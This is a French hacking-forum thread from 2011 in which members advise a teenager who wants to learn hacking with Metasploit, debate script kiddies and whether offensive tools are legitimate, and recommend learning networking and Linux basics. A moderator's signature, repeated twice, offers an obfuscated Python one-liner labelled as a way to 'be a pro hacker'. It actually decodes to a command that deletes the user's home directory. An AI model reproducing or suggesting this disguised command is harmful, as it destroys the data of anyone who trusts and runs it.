Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#26 30-03-2011 11:07:01

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

Re : Je voudrais apprendre à bien hacker

G.Alex-713  a écrit :

EDIT: j'ai 4 icones :
-metasploit console
-metasploit GUI
-metasploit IRB
-metasploit Update

à quoi correspondent telles ?

Mais j’ai déjà précisé à quoi peut bien servir Métasploit console et Métasploit update,  la première pour lancer le bach et la seconde pour faire des mise à jour, Update => mise à jour.

Métasploit GUI est une interface graphique, au lieu d’écrire en ligne de commande avec le bach, tu peux appuyer sur des boutons et choisir les exploits, payloads, etc. dans des listes.

Métasploit IRB est un interpréteur Ruby en ligne de commande, il permet d’exécuter des commandes Ruby, car la version récente de Métasploit est écrite avec ce langage. Pas la peine d'aller tripoter dedans si tu ne connais pas ce langage smile

G.Alex-713  a écrit :

PS: je peux remettre mon AV après l'installation ? parceque je travaille sur le PC de ma mère et elle finiras par le remettre ! de plus j'ai pas envie d'être infecté par plein de virus !

Bien entendu tu peux remettre l’anti-virus après installation, sauf que si tu veux de temps à autre lancer un scan contre ton disque dur, évite à ton anti-virus d’aller fouiner dans le répertoire Métasploit. Et de ce coté là les virus ( plus particulièrement des trojans) sont stockés au froid dans un congélateur smile impossible qu’ils se déclenchent tous seuls.

G.Alex-713  a écrit :

je vais essayé d'apprendre à l'utiliser tout seul parce que je suis très fort pour ça

Tu sais que tu me fais trés peur là mad

[edit Noireaude] Doublon supprimé wink

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#27 30-03-2011 14:15:25

antares145
Membre d'honneur
Site Web

Metasploit ne risque pas de t'infecter, ou du moins pas méchamment (le "contrôleur" du virus resterait sur ta machine). Dès que tu vas remettre ton antivirus, il va redéclencher sur tous les codes malicieux donc ça te pourrira ton installation de Metasploit, je crois que ça va vite te prendre la tête smile

Ce que tu peux faire éventuellement, c'est installer Virtualbox et te faire une machine virtuelle Windows (sans antivirus) : au pire tu infectes la VM, mais l'ordi de maman ne craindra rien !

Pour ce qui est des icônes, je ne connais pas la version Windows mais à ta place je commencerais par la GUI. La "vraie" application c'est la console, mais elle sera sans doute moins facile à aborder au début wink

#28 31-03-2011 19:25:35

G.Alex-713
Membre

Blender c'était beaucoup plus simple ! pitié plus d'explication ! je démarre quoi, je clique où, j'apprend quoi, j'ecrit où, j'écrit quoi, je code où ? existe-t-il un tuto pour les débutants (vraiment beaucoup débutants) parceque c'est pas du tout comme tu l'as dit j'ai rien compris !

PS: ça serait sympa aussi un tuto pour l'assembleur ! parce que depuis que pour passer le temps en cours de français je me suis mit a écrire en binaire selon la table ASCII (des trucs court comme mon prénom de 9 lettres suivi d'un espace puis mon nom de 7 lettres me prennent 30 min à traduire je sais pas si c'est rapide ou lent mais ça fait passer le temps en cours) le C++ devient ennuyeux ! (ou peut-être qui il y a aucun lien je dit ça parce que quand j'ai débuté la programmation je m'ennuyais nettement plus en cours alors...)
en plus l'assembleur doit être mieux que le C++ (explication: chez moi "mieux" veux dire plus complexe donc plus marrant)... En plus je préfère le bas niveau que le haut niveau (ça peut paraître bizarre mais je préférais SDL à Qt)

@ Fuji: c'est vrai que je suis fort pour apprendre tt seul mais là je dois admettre que c'est trop gros ! un lien vers quelque chose en français serait le bienvenue !

PS: je vais bientôt avoir un nouvel ordi portable (AlienWare m15x) je voudrais savoir pour tt ça quel anti-Virus serait le mieux adapté (le genre qui vous demande avant de supprimer un virus)

Dernière modification par G.Alex-713 (31-03-2011 19:32:27)

#29 31-03-2011 19:54:43

noireaude
Membre d'honneur
Lieu : Chez le docteur
Site Web

Bonjour G.Alex,

Ta question sur l'antivirus est hors propos, si tu veux bien la poster dans la section appropriée, merci. wink

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#30 31-03-2011 20:56:28

antares145
Membre d'honneur
Site Web

Tu n'y mets pas beaucoup de bonne volonté non plus, ou alors je vois mal...
- on te dit que c'est mieux de travailler sous Linux (à terme si tu veux devenir un "hacker" ça sera même un passage obligé), tu préfères rester sous Windows
- on te dit que la majorité des tutos est en anglais et que tu devras l'apprendre à plus ou moins long terme, tu continues à réclamer des tutos en français
- je te file un lien avec les explications de base (le poste sur msfpayload), que Fuji répète et détaille juste après, et tu continues à demander "des infos", à croire que tu n'as pas lu ni essayé ce qu'on te propose
- tu dis vouloir apprendre tout seul, mais tu demandes un tuto détaillé pas-à-pas (légère contradiction)

Tu es motivé, ça se voit, mais là tu veux apprendre sans passer par les bases et tu râles parce qu'on ne sait pas t'aider à construire un building alors que tu sais à peine ce qu'est une brique... Si tu veux montrer ta bonne volonté, pose des questions précises et pas "donnez-moi un lien en français pour utiliser Metasploit sous Windows et bypasser tous les antivirus" hmm Donne toi les moyens d'apprendre, installe Ubuntu en machine virtuelle et plonge, tu ne le regretteras pas wink

#31 03-04-2011 17:58:12

G.Alex-713
Membre

j'ai pas dit vouloir apprendre tt seul j'ai dit que j'étais fort pour apprendre tt seul pas que je voulais apprendre tt seul (bien que j'ai essayé et rien compris)  ensuite c'est pas que je veux rester sous windows (même si qund c'est que mon futur nouveau PC est livré avec win7 (je téléchargerais une virtualisation) puis pour l'anglais je m'efforce de m'améliorer (à force de regarder des vost et de lire la doc de Qt ça devra bien un peu rentrer dans la tête ! de toute façon dans mon collège pourri les profs d'anglais adorent répéter pendant 6 mois que les superlatif se finissent par iest ou commençe par most (on fait du 1 page du livre par mois !) donc je peux pas compter sur l'école) pour le lien la vérité c'est que je tout ce que je comprend maintenant c'est que je suis qu'un ignorant qui n'y connait rien (j'ai rien compris ! c'est quoi LHOST ? c'est quoi svn ? il y aurait pas un site spécial débutant ignorant ? non mais parce que il y a un mois je savais même pas ce qu'était linux ni ce qu'était une console ! Vous comprenez ! je suis NUL)
PS: Ubuntu ? je croyais que je devais installer linux ?

#32 03-04-2011 18:06:29

koala
Membre d'honneur
Lieu : In the sky

Unbutu c'est linux hmm révise bien les base pour commencer... OS, invite de commande etc...

#33 03-04-2011 19:31:15

spawn
Modérateur

G.Alex-713, si tu veux devenir un pirate c'est ici.

Je t'invite cordialement à lire la charte du forum.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#34 03-04-2011 19:54:35

noireaude
Membre d'honneur
Site Web

spawn a écrit :

G.Alex-713, si tu veux devenir un pirate c'est ici.

Je t'invite cordialement à lire la charte du forum.

Merci Spawn m'a l'air excellent ton lien me suis inscrit j'adore ce genre de conneries smile.

Sinon G.Alex, il est clair que tu pars de très loin si tu ne sais pas qu'Ubuntu est une distro Gnu/Linux.
Je ne dit pas ça pour me moquer, je ne l'ai pas su non plus avant de m'intéresser au monde du libre.

Je te suggère donc de faire quelques recherches sur Google, afin d'apprendre certains principes de base.
Il y a pleins d'infos sur Gnu/linux. Tu devrais déjà apprendre à l'utiliser un minimum de manière classique surtout en mode commande avant d'aller plus loin.

Je ne dit pas ça pour te rabaisser ou pour insinuer que tu n'es pas à te place ici loin de la, mais il est clair que tu veux t'attaquer à des sujets qui te dépassent.

J'ai donné ainsi que d'autres personnes des liens super intéressants, avec pleins de tutos arborant tous les domaines, il y a des tonnes de super tutos sur ce site même, (qui requièrent déjà de bonnes bases) .
Bref documentes toi un max et reviens avec es bases et des questions qui ont déjà plus de substance plutôt que de compter sur le forum pour tout t'apprendre de A à Z.

Tu demandes si il n'y a pas de site pour débutants alors qu'il y a des liens sur ce forum et partout sur le net, tu veux devenir hacker mais apparemment faire une recherche google ou sur le forum pour te documenter paraît déjà te poser un problème.
Tu en conviendras, ce n'est pas très encourageant pour les personnes qui voudraient t'aider.
Ils pourraient penser en voyant cela que la tâche sera trop dur et y renoncer d'office.

Après tu fais ce que tu veux hein, ce n'est qu'une suggestion, mais tu vas stagner si tu ne produit pas un minimum d'efforts personnel.

Je suis assez d'accord avec les contradiction avancées par Antares aussi tu devrais en tenir compte.

L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

#35 03-04-2011 20:57:39

G.Alex-713
Membre

ok je vais chercher et lire tout les tutos de mon niveau et quand j'en saurais assez je lirais les tutos de ce site et après... je continuerais à me documenter smile j'apprend vite j'éspère juste trouver les bon tutos et apparement partout on m'encourage à faire des recherches alors c'est ce que je vais faire smile
même si au fond je suis pas plus avancé qu'au début du sujet... hmm

Je suis pile au niveau où j'en sais immensément plus que mes copains au collège et infiniment moins de ceux que je croise sur les forum ; d’ici on se rend compte de l'immensité de connaissance acquise et non-acquise ça peut paraître déstabilisant mais au moins je me rend compte que j'ai encore beaucoup de chemin à faire ! ça va me bouffer pas mal (presque tout) mon temps libre mais ça doit valoir le coups .

PS: j'ai réussi à caser un point-virgule ! ^^

Dernière modification par G.Alex-713 (03-04-2011 21:01:38)

#36 03-04-2011 21:21:43

noireaude
Membre d'honneur
Site Web

Je te rassure on est tous passé par la, moi même comparé à l'ensemble des posteurs actifs ici je suis à la ramasse, mais j'ai compris une chose.

Il ne faut pas vouloir aller trop vite, vas y cool, prend le temps de découvrir et prends le temps de faire autre chose aussi wink

#37 04-04-2011 19:44:53

G.Alex-713
Membre

merci c'est sympa !
ce conseil va m'être utile parce qu'aller trop vite c'est tout à fait mon genre !

#38 04-04-2011 20:42:55

toto
Membre V.I.P.
Lieu : chez le docteur aussi

Salut

ce lien m'a aider a avancé mais le dos est tout aussi important a maitriser je te laisse nous trouver un bon lien pour lui

tu as de très bon conseil de mes amis alors je n'en dit pas plus amuse toi bien sur tes machines

smile

#39 04-04-2011 23:05:10

M.duck
Membre

Pardon mais je me dois de dire un mot !

Merde.

Ici ce ne sont pas des personnes voulant apprendre à hacker mais à pirater.

Excuse moi mais que vas tu faire une fois le serveur du lycée piraté ? C'est tu seulement ce que tu peux obtenir de lui ? Le faire crasher pour montrer au copain que tu es fort ? Ou exposé de manière clair les failles de sécu que tu as exploité pour pénétrer dans la machine , puis expliqué à un admin les possibilité qu'il a de sécuriser cela ?

Bitfrost ? Apprend d'abord tous ce qu'il y' a savoir sur les trojans avant de vouloir jouer avec un logiciel de création de trojan (Je sais il ne fait pas que cela , mais dans ton cas je doute que tu veuille l'employer pour autre chose.)

Metasploit c'est bien. En effet c'est bien car tu ne risque pas de le faire fonctionner. Tu auras beau suivre des tutos , tu ne feras que tester la faille smb netapi en boucle (Faille la plus simple et la plus courante que l'on trouve sur le net et les tutos)

Un bon point pour toi c'est que tu connais la différence entre un switch et un hub. Maintenant exploite plutôt ce genre de connaissance. Un simple sniff du réseau te donnerai déjà plein de chose. Mais .. comment on fait cela ? Si tu ne sais pas répondre à cette question alors il y'a plein de chose à voir.

Ne mélange pas non plus les attaques réseau et système. Apprendre à coder est bien mais c'est plus que 2 chapitre de SDZ qui suffiront.

Si j'étais méchant je dirais que tu ressembles à un parfait petit SK.

Mais je vais être gentil et avoir le doute. Je te conseille alors d'apprendre ce qu'est la sécurité informatique et ses domaines. Puis pense à voir ce qu'est le réseau et le systéme. Tu peux te passer de linux aussi. Mais tu n'iras pas loin dans la compréhension d'un système.

Je suis déçu de voir que des gens répondent ici ou donne des tuto / astuces pour utiliser des logiciels qui n'ont jamais était créer dans un but de test mais bien de vole.

#40 05-04-2011 01:09:35

noireaude
Membre d'honneur
Site Web

Je comprend un peu ta colère M.duck, le 1er but avoué valait sans aucun doute un ban.

Alors je ne cherche pas à justifier la non déscision car l'erreur est humaine.
Mais je vas te l'expliquer quand même car tu as le droit de te poser de questions sur ce cas précis et tu n'es peut être pas le seul. (Mais la je parle pour moi pas au nom du staff).

N'ayant pas réagi de suite, pas tout lu, fatigué, pas tilté avant de répondre, bref ça peut arriver.
J'ai pensé qu'il n'aurait pas été cohérent de sanctionner après coup.
Il n'aurait sans doute pas compris pourquoi banir après avoir répondu.
Il aurait eu raison.

Il s'est amendé entre temps, sincère, pas sincère ? J'ai un doute, mais l'ai à l'oeil et du bon.

Cela peut paraître injuste pour d'autres qui eux l'ont été de suite, mais c'est comme ça.

Personnelement je parie un pis que de toute façon le serveur de son collège a encore de beaux jours devant lui lol.

Pour le reste je ne suis pas d'accord avec ta dernière phrase.
Je ne vois pas en quoi un tuto Aircrack serait plus légitime qu'un tuto sur un trojan?
Que je sache Aircrack n'a pas été crée sans que son auteur ne se doute qu'il puisse être mal utilisé.
Ou alors il était naïf et ca je ne le crois pas smile.
Il en va de même pour tous les softs intrusifs/offensifs.

En ayant l'esprit large :

Aircrack peut être le premier point d'entrée dans un réseau sans fil et mener à une intrusion complète de celui-ci.
Par conséquent techniquement Aircrack peut être vu comme un trojan d'un certain point de vue.
Il est même pire qu'un trojan, car lui passe tous les antivirus.

La vocation du site n'est pas pour autant d'en faire une promotion malsaine.
Il se veut éducatif et collaboratif comme pour tous les autres domaines évoqués dans les diverses sections.
Il est important de garder cela à l'esprit.

Cela doit prévaloire sur tout le reste, sinon on ne parle de plus rien. (Déjà que les libertés fondent comme neige au soleil depuis Sarko et sa clique).

Je pense qu'on doit se battre pour conserver ce genre d'espaces de disscussions car tout le monde doit avoir le droit de s'informer et ce, dans tous les domaines.

C'est la base de la liberté d'expression, qui elle même et fondamentale dans une démocratie.

#41 05-04-2011 06:16:27

toto
Membre V.I.P.
Lieu : chez le docteur aussi

perso je n'ai pas l'impression que l'on lui donne des liens très direct mais plutôt lui faire découvrir par ses moyen comment marche un système si on voulais l'aider très explicitement alors ce n'est pas vers un guide de survie sous linux qu'on l'orienterai

tu te fait trop de mouron mon amis et pour rien je l'ai déjà dit on est pas assez technique ici parce-que justement nous sommes trop .... noobs

cordialement

#42 05-04-2011 08:22:21

noireaude
Membre d'honneur
Site Web

Me permet d'argumenter tes propos Toto.

Noob ne veut rien dire pour moi, c'est juste une étroitesse d'esprit péjorative.
Même le plus érudit est un noob dans un grand nombre de domaines si il ne s'y est jamais adonné.

Ce qui compte c'est le potentiel, un "noob" avec du potentiel est déjà à moitié un érudit et on n'en manque pas ici wink.

C'est comme du bo vin euh bon vin qui ne demande qu'à vieillir pour ce bonifier.

Pour le reste je suis assez d'accord avec toi et sur ce on laisser le topic mourir ou reprendre son cours tranquillou, on peut en discuter sur un autre post si besoin est.

Suis fatigué vais me coucher moâ.

#43 05-04-2011 10:36:11

M.duck
Membre

Bonjour,

La suite Aircrack permet de prouver la non-fiabilité des clé Wep. Il permet de faire de la sécurité pro-active dans son entourage. Un créateur de trojan permet de prouver quoi ? Qu'un antivirus est utile ?

A la rigueur si la personne chercher à coder un trojan soit même je veux bien mais nous ne somme pas dans ce cas.

Si on est capable de dire que l'on est "noob" alors il faut aussi savoir commencer sur des choses plus accessible. Pour moi donner un tuto Aircrack à quelqu'un qui ne connait quasi pas les principes du wifi ou la différence entre un paquet ARP d'un paquet SYN est aussi une erreur.

Apres on est sur un forum qui ce veut amical donc je ne vois pas de raison de donner du ban non plus. Mais je déplore juste le trop grand nombre de poste de personne sans connaissance qui désire juste être capable de casser quelque chose sans raison. Si en plus le but avouer et un vol de donnée alors oui le ban devrait tomber.

#44 05-04-2011 12:13:22

spawn
Modérateur

Bonjour ! aujourd'hui, je trolle :

+1 M.duck

Ubuntu est un ancien mot africain pour dire humanité.
n00b est un ancien mot malsain pour dire son orgueil.

Freud : "Enfant : pervers polymorphe prêt à tout pour obtenir son plaisir".

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#45 05-04-2011 12:29:21

koala
Membre d'honneur
Lieu : In the sky

Mais je déplore juste le trop grand nombre de poste de personne sans connaissance qui désire juste être capable de casser quelque chose sans raison. Si en plus le but avouer et un vol de donnée alors oui le ban devrait tomber.

plus_un

Le problème est qu'il est difficile de savoir réellement qui veut casser quoi.

#46 05-04-2011 14:33:34

G.Alex-713
Membre

mais s'il vous plait oubliez cette histoire de piratage ! cette idée m'était venue pour, plus tard tester mes futures capacités et en plus je l'ai abandonné ! ...et je suis effectivement sincère
tout ce que je veux c'est apprendre et obtenir du savoir-faire surtout que je pense que quand on sais faire de gros virus et trojans on doit savoir s'en prémunir (et je suis sur qu'avec les avancée de la technologie cela deviendra au fur et à mesure très utile) après, tout ce que je veux c'est de l'aide et des redirections pour bien apprendre !
en fait le titre de ce sujet devrait non pas être "je veux apprendre à bien hacker" mais "je veux qu'on m'aide à apprendre à devenir un bon hacker" et par "bon" j'entend tout les sens morals de la chose

PS: je crois que le sens de "noob" c'est un débutant qui croit tout savoir alors qu'il ne sait rien
Or je ne prétend pas tout savoir et je suis désolé si c'est l'impression que je donne

#47 05-04-2011 16:04:19

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

M.duck a écrit :

Je suis déçu de voir que des gens répondent ici ou donne des tuto / astuces pour utiliser des logiciels qui n'ont jamais était créer dans un but de test mais bien de vole

Ici on crack les Script kiddies avant de cracker le wifi, et on sait le faire. Tu crois que Metasploit échappe à l’intention  de tous ceux qui désirent apprendre à hacker ?
Tu crois aussi que ce soft a été développé dans le but de voler les ressources des autres ? ou plutôt comme le dit Jérôme ATHIAS Il n’y a pas de logiciels POUR script-kiddies. Il y a juste des script-kiddies qui utilisent des logiciels.

Franchement, n’importe qui peut être givrer comme un citron derrière un pseudo et venir ici pour poster. Le petit tuto que j’ai donné n’est que l’adaptation de Métasploit pour windows, est-ce que on a montré comment détourner un serveur ? les exploits qui vont avec ? comment crypter un meterpreter ?  v’as-tu reprocher la même chose à tous ceux qui télécharge Back Track avec ses  300 logiciels de hack, de test ou de piratage ? avec toute la mémoire de google et l’aide d’autres forums il y a de quoi apprendre pour faire sauter la moitié des serveurs de la planète.

Ce forum est clair et transparent, nous prenons tous un réel plaisir à discuter et échanger nos connaissances, et le règlement est là et personne n’est censé l’ignoré. Pas la peine de remettre en cause le sérieux et la probité morale et intellectuelle des membres et des modérateurs, qui ont suffisamment d’expériences pour juger si un topic doit être verrouiller et la personne bannie.

#48 05-04-2011 16:59:28

noireaude
Membre d'honneur
Site Web

Je le répète encore une fois si vous voulez débattre plus en détail de cet aspect je vous invite à ouvrir une discussion à cet effet et à donner votre avis.
Cela peut être intéressent.

Ca ne sert à rien de faire dériver le topic plus que ça, car de toute façon vos remarques se perdront dedans et n'auront pas vraiment d'impact pour des intervenants qui ne passeraient pas par la.

#49 05-04-2011 22:44:49

spawn
Modérateur

"Cela peut être intéressant" => attention, chute de pavés ^^

Pour ce qui est d'apprendre à ******, je te conseille d'apprendre à utiliser l'assembleur, le seul, le vrai et de te renseigner sur ce que tu veux faire.

Quel mérite y-a t'il à péter du WEP avec aircrack lorsq'ue l'on ne sait pas ce qu'est une requête ARP ?
(cet exemple est à réutiliser avec tous les exemples qui vous passent par la tête..)

à bonne entendeur, plop.

@9b0ae3c4 méric.fr

#50 05-04-2011 23:35:39

M.duck
Membre

Ce n'est pas ton tuto Fuji que je remets en cause.

Par contre je peux te donner une liste de logiciel créer dans le seul but de faire des dégats.
Prend Bblackhole exploits  , un kit vendu à la base sur du black market pour automatiser des attaques. La configuration du logiciel ne permet pas de "tester" un réseau.

Métasploit lui dans sa configuration permet une automatisation d'exploit mais d'une maniere qui permet de faire de l'audit.

Je ne vais pas débattre sur ce cela c'est infinie et chacun à la propre frontière.

Pour revenir dans le sujet et aidé notre ami je dirais :

-Le sujet devrait être "apprendre la sécurité informatique" , si tu apprend à sécurisé un systéme tu apprend à te protéger des attaques. C'est plus long mais tes connaissances seront plus solide.

-Ces deux site : http://www.misfu.com/ et http://www.frameip.com/  si tu les lis bien comme il faut , surtout le deuxieme , alors tu auras de quoi avoir de très bonne base. La plus part des gens ne connaissent pas tous ce qu'il y'a sur frameip alors que c'est une bible en terme de définition. Pas d'attaque ou de tuto ici mais avec la somme de connaissance disponible tu as de quoi comprendre seul.

Si tu veux casser un mur , apprend d'abord de quoi est fait ce mur.

Ca marche pour la sécu ,)

Annonce